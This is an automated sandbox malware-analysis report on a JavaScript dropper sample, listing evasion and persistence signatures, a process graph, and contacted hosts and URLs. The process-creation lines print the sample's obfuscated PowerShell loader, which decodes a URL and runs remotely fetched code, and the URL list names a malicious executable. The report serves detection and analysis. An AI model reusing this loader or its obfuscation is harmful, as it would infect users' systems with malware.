Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8B61D1 push eax; ret 2_2_00007FFD9B8B61DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB930EA push edx; iretd 2_2_00007FFD9BB930EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB944FA pushad ; retf 2_2_00007FFD9BB944FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB94D0A push eax; ret 2_2_00007FFD9BB94D0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0D4E3 push eax; iretd 2_2_00007FFD9BC0D629
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0CFB3 push eax; iretd 2_2_00007FFD9BC0CFED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0CBAC push esi; retf 0000h 2_2_00007FFD9BC0CBB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0CBD8 push es; retf 2_2_00007FFD9BC0CBD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0CB92 push esi; retf 0000h 2_2_00007FFD9BC0CBA9

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3689 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6189 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496 Thread sleep count: 3689 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192 Thread sleep count: 6189 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware(
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine(
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "VMware"
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000002.00000002.1800811353.000001B34652C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira) Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira) Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1416950 Sample: f699.js Startdate: 28/03/2024 Architecture: WINDOWS Score: 96 17 temp.sh 2->17 19 mknjddllgakhaje.top 2->19 21 isyzgez.top 2->21 29 Snort IDS alert for network traffic 2->29 31 Multi AV Scanner detection for domain / URL 2->31 33 Antivirus detection for URL or domain 2->33 35 2 other signatures 2->35 8 wscript.exe 1 2->8         started        signatures3 process4 signatures5 37 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->37 39 Suspicious execution chain found 8->39 41 Creates processes via WMI 8->41 11 conhost.exe 8->11         started        process6 process7 13 powershell.exe 14 23 11->13         started        dnsIp8 23 temp.sh 51.91.79.17, 443, 49731 OVHFR France 13->23 25 isyzgez.top 192.153.57.159, 49729, 80 OARNET-ASUS United States 13->25 27 mknjddllgakhaje.top 164.90.149.198, 49730, 80 DIGITALOCEAN-ASNUS United States 13->27 43 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->43 45 Queries memory information (via WMI often done to detect virtual machines) 13->45 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.153.57.159
 isyzgez.top United States
600 OARNET-ASUS false
51.91.79.17
 temp.sh France
16276 OVHFR false
164.90.149.198
 mknjddllgakhaje.top United States
14061 DIGITALOCEAN-ASNUS false

Contacted Domains

Name IP Active
temp.sh 51.91.79.17 true
isyzgez.top 192.153.57.159 true
mknjddllgakhaje.top 164.90.149.198 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://isyzgez.top/1.php?s=mints1 false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://temp.sh/bfseS/ruzxs.exe false
  • 10%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
